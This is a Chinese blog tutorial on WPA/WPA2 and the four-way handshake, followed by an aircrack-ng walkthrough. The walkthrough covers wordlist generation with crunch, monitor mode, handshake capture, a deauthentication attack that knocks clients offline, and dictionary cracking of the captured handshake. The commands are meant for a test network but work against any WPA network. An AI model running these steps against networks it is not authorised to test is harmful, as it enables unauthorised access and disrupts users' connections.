无线WiFi安全渗透与攻防(九)之aircrack-ng渗透WPA加密

WPA-aircrack-ng渗透WPA加密

1.WPA概念介绍

WPA 全名 WI-FI Protected Access, 有WPA 和WPA2两个标准,是一种保护无线网络的安全协议。

WPA实现了IEEE802.11i标准的大部分,是在802.11i完备之前替代WEP的过度方案,后被WPA2取代。

由于WPA和WPA2都是基于802.11i,因此在技术层面几乎是相同的。主要区别在于WPA2要求支持更安全的CCMP。

2.工作原理

WPA和WPA2均使用802.11i中定义的四次握手,客户端(station)和接入点(AP)通过四次握手相互验证和协商名为成对临时密钥(Pairwise Transient Key, PTK)的会话密钥。PTK通过成对主密钥(Pairwise Master key, PMK)、AP随机数ANonce、STA随机数SNonce和双方MAC地址等计算生成。其中PMK由登陆密码等双方均已知的信息计算生成,而后续正常数据加密所使用的临时密钥(Temporal KEY, TK)即派生自PTK,各密钥、参数的关系如下:

在这里插入图片描述

四次握手的过程可概括如下:

(1)AP发送自己的随机数ANonce给STA

(2)STA生成随机数SNonce,计算出PTK,并将SNonce和信息完整性校验码MIC发送给AP

(3)AP收到SNonce,计算出PTK(此时双方都有PTK),将组密钥GTK加密后连同MIC发给STA

(4)STA收到GTK,安装PTK和GTK,发送ACK确认。AP收到确认后安装PTK。

在这里插入图片描述

3.wifi设置

1.打开wifi设置网站

http://192.168.1.1/   //路由器地址                           

在这里插入图片描述

2.选择无线配置

在这里插入图片描述

3.选择加密方式

在这里插入图片描述

4.打造字典

1.crunch生成密码

crunch 8 8 -t %%%%%,,, > pwd.txt
8:最小长度
8:最大长度
-t:定义输出格式
,:代表大写字母
%:代表数字
^:代表符号
14GB大字典

在这里插入图片描述

查看字典

tail pwd.txt

在这里插入图片描述

2.手工打造

vi passwd.txt

12456
sadasdas
SXiooo1
16330XSX
12345678

在这里插入图片描述

5.渗透步骤

1.查看网卡

ip a

在这里插入图片描述

2.开启监听模式

airmon-ng start wlan0

在这里插入图片描述

3.扫描wifi

airodump-ng wlan0mon

在这里插入图片描述

4.抓包保存

airodump-ng wlan0mon -c 1 --bssid 10:BD:18:08:43:31 -w wpa-1 
-c:指定信道
--bssid:AP的MAC地址
-w:保存抓包结果

在这里插入图片描述

5.进行冲突模式攻击

将设备踢下线,当用户重连的时候,就会抓到握手包

aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
-a:设置 ap 的 mac
-c:设置已连接的合法客户端的 mac

在这里插入图片描述

6.破解wifi

aircrack-ng -w passwd.txt wpa-1-01.cap

在这里插入图片描述

7.使用大字典破解

aircrack-ng -w pwd.txt wpa-1-01.cap

在这里插入图片描述

在这里插入图片描述

8.不指定字典破解

crunch 8 8 -t %%%%%,,, | aircrack-ng wpa-1-01.cap -e cisco-432F -w -

在这里插入图片描述

推荐用这种随时生成密码随时破解,不会像生成密码那样占用大量的磁盘空间

posted @ 2023-03-14 22:43  私ははいしゃ敗者です  阅读(34)  评论(0编辑  收藏  举报  来源